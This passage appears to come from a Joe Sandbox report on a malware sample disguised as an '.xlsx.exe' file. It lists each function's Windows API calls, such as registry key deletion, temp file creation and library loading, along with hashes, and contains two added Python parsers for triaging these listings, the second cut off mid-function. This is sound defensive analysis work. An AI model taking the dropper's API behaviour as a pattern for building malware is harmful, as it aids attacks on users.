                                                          • API ID: File$Pointer$CountTickWrite
                                                          • String ID:
                                                          • API String ID: 2146148272-0
                                                          • Opcode ID: 38246e7ae17352d7cedfc7595443620c434811b06811d2a86a618e437c7072d2
                                                          • Instruction ID: 34320a24581f7621071559271f75aff2a33e70c32c739a51ea230fcf3b1a2f41
                                                          • Opcode Fuzzy Hash: 38246e7ae17352d7cedfc7595443620c434811b06811d2a86a618e437c7072d2
                                                          • Instruction Fuzzy Hash: CB418B72504205DFDB109F29EE84AA63BADF74431671441BFE604B22E1C7B96D418BEC
                                                          APIs
                                                            • Part of subcall function 004061DC: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,75573420,00403542), ref: 0040623F
                                                            • Part of subcall function 004061DC: CharNextW.USER32(?,?,?,00000000), ref: 0040624E
                                                            • Part of subcall function 004061DC: CharNextW.USER32(?,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,75573420,00403542), ref: 00406253
                                                            • Part of subcall function 004061DC: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,75573420,00403542), ref: 00406266
                                                          • CreateDirectoryW.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,00403542), ref: 00403347
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: Char$Next$CreateDirectoryPrev
                                                          • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 4115351271-3144792594
                                                          • Opcode ID: add472499a8119111063815a34edcff77b501a95eafb2cc4bed7984a25da3e62
                                                          • Instruction ID: 64a45b222adfb8bd76fd8b495f2d7cf88aee328212c381153bc1e0c9699f7593
                                                          • Opcode Fuzzy Hash: add472499a8119111063815a34edcff77b501a95eafb2cc4bed7984a25da3e62
                                                          • Instruction Fuzzy Hash: 22D0C92251AA3135C551372A7D06FCF295C8F0A329F12A477F809B90C2CB7C2A8249FE
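Added example, not part of this report or of Joe Sandbox's own tooling: a small Python triage helper that parses the "APIs" lines of the function blocks above into records and flags the behaviours those blocks show: the RegEnumKeyW/RegDeleteKeyW pair at 00402BD7, the HKLM Software\Microsoft\Windows\CurrentVersion lookup at 00405E3F, GetTickCount followed by GetTempFileNameW under the user's Temp directory at 00405C01, and CreateDirectoryW at 00403347. The rule names and the choice of the lowest direct-call address as a function key are the example's own; the sample input is copied from this section, with one argument list shortened, and lines that are not API lines are ignored so a whole block can be pasted in unchanged.

```python
"""Triage helper for the per-function "APIs" listings of a Joe Sandbox report.

Added example, not part of the report or of Joe Sandbox's tooling. It parses
API lines of the shape used in this section, e.g.

    • GetTickCount.KERNEL32 ref: 00405C01
    • GetTempFileNameW.KERNELBASE(?,?,...,C:\\Users\\user\\AppData\\Local\\Temp\\), ref: 00405C1C
      • Part of subcall function 004061DC: CharNextW.USER32(?,?,?,00000000), ref: 0040624E

into records and applies a few behaviour rules. Rule names are this example's
own choices.
"""
import re
from typing import Dict, List

# One API line: optional "Part of subcall function XXXXXXXX:" prefix, then
# Api.Module(args) or Api.Module with no argument list, then "ref: XXXXXXXX".
API_LINE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<via>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
HEX32 = re.compile(r"^[0-9A-Fa-f]{8}$")

# Constructed sample: API lines copied from four function blocks of this report
# (the CreateDirectoryW argument list is shortened).
SAMPLE_REPORT = r"""
APIs
• RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
• RegCloseKey.ADVAPI32(?), ref: 00402BE0
• RegCloseKey.ADVAPI32(?), ref: 00402C05
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
APIs
• RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,Call,?,00406088,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E3F
• RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,00406088,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E60
• RegCloseKey.ADVAPI32(?,?,00406088,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E83
APIs
• GetTickCount.KERNEL32 ref: 00405C01
• GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403358,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405C1C
APIs
  • Part of subcall function 004061DC: CharNextW.USER32(?,?,?,00000000), ref: 0040624E
• CreateDirectoryW.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,75573420,00403542), ref: 00403347
"""


def parse_blocks(text: str) -> List[List[dict]]:
    """Split the text at each "APIs" heading and parse the API lines under it.
    Non-API lines (memory dump sources, hashes, ...) are skipped."""
    blocks: List[List[dict]] = []
    current = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            blocks.append(current)
            continue
        m = API_LINE.match(line)
        if m is None or current is None:
            continue
        args = m.group("args")
        current.append({
            "api": m.group("api"),
            "module": m.group("module"),
            "args": args.split(",") if args else [],
            "ref": int(m.group("ref"), 16),
            "via": m.group("via"),  # None for a direct call, else the subcall address
        })
    return blocks


def resolved_strings(block: List[dict]) -> List[str]:
    """Arguments the sandbox resolved to something readable: neither "?"
    (unknown) nor a bare 32-bit hex value (pointer, handle or flag)."""
    return [a for call in block for a in call["args"]
            if a and a != "?" and not HEX32.match(a)]


def flag_block(block: List[dict]) -> List[str]:
    """Apply the behaviour rules to one function's API block."""
    direct = {c["api"] for c in block if c["via"] is None}
    strings = resolved_strings(block)
    findings: List[str] = []
    if "GetTempFileNameW" in direct and any(s.lower().endswith("\\temp\\") for s in strings):
        findings.append("creates a temp file under the user's Temp directory")
    if {"RegEnumKeyW", "RegDeleteKeyW"} <= direct:
        findings.append("enumerates and deletes registry subkeys (recursive key removal)")
    if "RegOpenKeyExW" in direct and any(
            "80000002" in c["args"] and any("CurrentVersion" in a for a in c["args"])
            for c in block):
        findings.append("reads HKLM\\Software\\Microsoft\\Windows\\CurrentVersion")
    if "WriteFile" in direct:
        findings.append("writes to a file")
    if "CreateDirectoryW" in direct:
        findings.append("creates a directory")
    return findings


def triage(text: str) -> Dict[str, List[str]]:
    """Map the lowest direct-call address of each flagged function to its findings."""
    result: Dict[str, List[str]] = {}
    for block in parse_blocks(text):
        direct_refs = [c["ref"] for c in block if c["via"] is None]
        if not direct_refs:
            continue
        findings = flag_block(block)
        if findings:
            result["%08X" % min(direct_refs)] = findings
    return result


if __name__ == "__main__":
    for addr, findings in triage(SAMPLE_REPORT).items():
        print(addr, "->", "; ".join(findings))
```

Subcall lines are kept but not counted toward a function's own behaviour, so the CharNextW calls reached through 004061DC do not make 00403347 look like a string-parsing routine; the 80000002 check relies on the sandbox printing the HKEY_LOCAL_MACHINE handle value as a bare hex argument, which is what the lines above show.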
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ba6317b19b7b230722eb11252d44c293277e5dc1cbca2e551617393c5194c9d0
                                                          • Instruction ID: dca007468fed7c27dd914b546e5ea1ac9ab056a0c62ecf1bea7b7831388965f7
                                                          • Opcode Fuzzy Hash: ba6317b19b7b230722eb11252d44c293277e5dc1cbca2e551617393c5194c9d0
                                                          • Instruction Fuzzy Hash: 58A14471E00229DBDF28CFA8C8447ADBBB1FF48305F15816AD856BB281C7785A96CF44
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: db87408b1e9cadcd0a4c6ae5b6f4dd47f3337075cb2a4d2d14f0ff51d5c97f6a
                                                          • Instruction ID: e31ab10654d3133c4bbe562e0396aaf9f668a3464ceaf5ac7e335a669e1e1d03
                                                          • Opcode Fuzzy Hash: db87408b1e9cadcd0a4c6ae5b6f4dd47f3337075cb2a4d2d14f0ff51d5c97f6a
                                                          • Instruction Fuzzy Hash: 8E912371E00228CBEF28CF98C8587ADBBB1FF44305F15816AD856BB291C7785A96DF44
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 165f4b65d4ff5263617aa106d744e60dbd7c4f5d43725cc52d5e79b0d4499ef2
                                                          • Instruction ID: e0c60a541a5106e25e0a2f50f35f038ee2aa27f15edb78bccdd8f3c871378321
                                                          • Opcode Fuzzy Hash: 165f4b65d4ff5263617aa106d744e60dbd7c4f5d43725cc52d5e79b0d4499ef2
                                                          • Instruction Fuzzy Hash: 2C814471D04228DFDF24CFA8C8487ADBBB1FB45305F25816AD456BB281C7789A96CF44
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 148eda801716ed3d9969b88488a2fa3c6a7092fa608051ce9148cc038319d1b3
                                                          • Instruction ID: c1f18cc480c27d0a28c5d6dc1e8cd9b1e5e62e2ab7f78041d4dc85e199002e6a
                                                          • Opcode Fuzzy Hash: 148eda801716ed3d9969b88488a2fa3c6a7092fa608051ce9148cc038319d1b3
                                                          • Instruction Fuzzy Hash: 9B816731D04228DBDF24CFA8C8487ADBBB1FB44305F25816AD856BB2C1C7785A96DF84
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4983b507bd6312ae2b30a384a7c44b2e85aa51a10719cb6f4e73ba4d3199020d
                                                          • Instruction ID: 317a4f11872e46a6f39a96627fb546a7164eb21cb9e645d400dda74b69288846
                                                          • Opcode Fuzzy Hash: 4983b507bd6312ae2b30a384a7c44b2e85aa51a10719cb6f4e73ba4d3199020d
                                                          • Instruction Fuzzy Hash: 48713471D04228DFEF24CFA8C8447ADBBB1FB48305F15816AD856BB281C7785A96DF44
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 02494a79b55f78bffb2877069ace75a440f4ea31aa61c09e76d6a1b36594b02c
                                                          • Instruction ID: 7b464a411068ed62169f7738ff9b09ef3af2f2625e32a791141ed05019b82bd1
                                                          • Opcode Fuzzy Hash: 02494a79b55f78bffb2877069ace75a440f4ea31aa61c09e76d6a1b36594b02c
                                                          • Instruction Fuzzy Hash: A4714571E04228DFEF28CF98C8447ADBBB1FB48301F15816AD456BB281C7785996DF44
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e250f200d648af3f0bd61970bfe314c861a6b6aa0b25ddc882d3b39d553e7667
                                                          • Instruction ID: 924b227091e8338000478ad755e115b80dfeef44851b3a3b0f99ac33e872c674
                                                          • Opcode Fuzzy Hash: e250f200d648af3f0bd61970bfe314c861a6b6aa0b25ddc882d3b39d553e7667
                                                          • Instruction Fuzzy Hash: 07713571E04228DBEF28CF98C8447ADBBB1FF44305F15816AD856BB281C7785A96DF44
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000,00409230,?), ref: 00403088
                                                          • WriteFile.KERNELBASE(00000000,00413E90,?,000000FF,00000000,00413E90,00004000,00409230,00409230,?,00000004,00000000,00000000,?,?), ref: 00403115
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: File$PointerWrite
                                                          • String ID:
                                                          • API String ID: 539440098-0
                                                          • Opcode ID: 90118ecf7a9ba7c1b0c512c54543666c71b076bc3a218e086344a49311413f62
                                                          • Instruction ID: e0bff1d0cfda9ca41153e72f66d50dbc15cd376e58f7be5246e1248deba32b17
                                                          • Opcode Fuzzy Hash: 90118ecf7a9ba7c1b0c512c54543666c71b076bc3a218e086344a49311413f62
                                                          • Instruction Fuzzy Hash: A2315971504218EBDF20CF65ED45A9F3FB8EB08755F20807AF904EA1A0D3349E40DBA9
                                                          APIs
                                                          • GetModuleHandleW.KERNELBASE(00000000,00000001,?), ref: 00401FC3
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                            • Part of subcall function 004051F2: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
                                                            • Part of subcall function 004051F2: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll), ref: 0040525F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                          • LoadLibraryExW.KERNEL32(00000000,?,?,00000001,?), ref: 00401FD4
                                                          • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,?,00000001,?), ref: 00402051
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 334405425-0
                                                          • Opcode ID: a8461a16ac82fd46328c3b40fe1928024aef525999e2dd49edf51c7c032d1790
                                                          • Instruction ID: 409458e37c45ac75b59f5eb787cb01d488d5b476e6d1706a1798d0305ac83909
                                                          • Opcode Fuzzy Hash: a8461a16ac82fd46328c3b40fe1928024aef525999e2dd49edf51c7c032d1790
                                                          • Instruction Fuzzy Hash: A221C571904215F6CF206FA5CE48ADEBAB4AB04358F70427BF610B51E0D7B98E41DA6E
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1608943585.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.1608921207.0000000010000000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 00000000.00000002.1608963992.0000000010003000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 00000000.00000002.1609013607.0000000010005000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: EnumErrorLastWindows
                                                          • String ID:
                                                          • API String ID: 14984897-0
                                                          • Opcode ID: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                          • Instruction ID: 77f315af6c145f6c632c2ebe68d3f6cdb0cf0445c85f86b19d364da59c27affc
                                                          • Opcode Fuzzy Hash: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                          • Instruction Fuzzy Hash: 8851C4B9905214DFFB20DFA4DD8675937A8EB443D0F22C42AEA04E721DCE34E990CB55
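The records above all follow one layout: an optional "APIs" list (direct calls plus "Part of subcall function" entries), the "Memory Dump Source" the function was lifted from, the IDA plugin snapshot, and the "Similarity" fields carrying the opcode and instruction fuzzy hashes. Turning that text into structured data is what lets an analyst pivot on a fuzzy hash across reports, or list which APIs each image base (0x400000 here, and 0x10000000 for the second module) calls directly. The following Python is an added example, not part of this report or of Joe Sandbox: the field values in SAMPLE are copied from the listing above, while the layout rules it applies (a record starts at "APIs", or at "Memory Dump Source" when a function has no API list) are inferred from how the text renders, and positional_matches is a plain hex-digit comparison of my own, not the similarity metric the sandbox uses.

```python
"""Parse Joe Sandbox per-function disassembly records ("APIs" / "Memory Dump
Source" / "Joe Sandbox IDA Plugin" / "Similarity") into structured data.
Added example, not part of the report or of Joe Sandbox; SAMPLE values are
copied from the report, the layout rules and the positional metric are
assumptions of this example. Needs Python 3.9+ (str.removesuffix)."""
import re
from dataclasses import dataclass, field

API_RE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-F]{8}): )?"
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-F]{8})$"
)
SOURCE_RE = re.compile(r"^(?P<dump>\S+\.sdmp), Offset: (?P<base>[0-9A-F]{8})")
LINK_RESIDUE = "Download File"  # link label the HTML export glues onto dump names

@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)    # (api, module, ref_addr, caller or None)
    dump: str = ""                              # memory dump the function was lifted from
    base: int = 0                               # image base of that dump
    fields: dict = field(default_factory=dict)  # remaining "Key: value" bullets as shown

def parse_records(text):
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        # "APIs" opens a record; a function without API calls has no such header,
        # so "Memory Dump Source" opens one too once the current record has its dump.
        if line == "APIs" or (line == "Memory Dump Source" and (cur is None or cur.dump)):
            cur = FunctionRecord()
            records.append(cur)
            continue
        if cur is None or not line.startswith("•"):
            continue  # section labels such as "Similarity" carry no data
        body = line[1:].strip()
        m = API_RE.match(body)
        if m:
            cur.apis.append((m["api"], m["module"], int(m["ref"], 16), m["caller"]))
            continue
        key, _, value = body.partition(":")
        value = value.strip()
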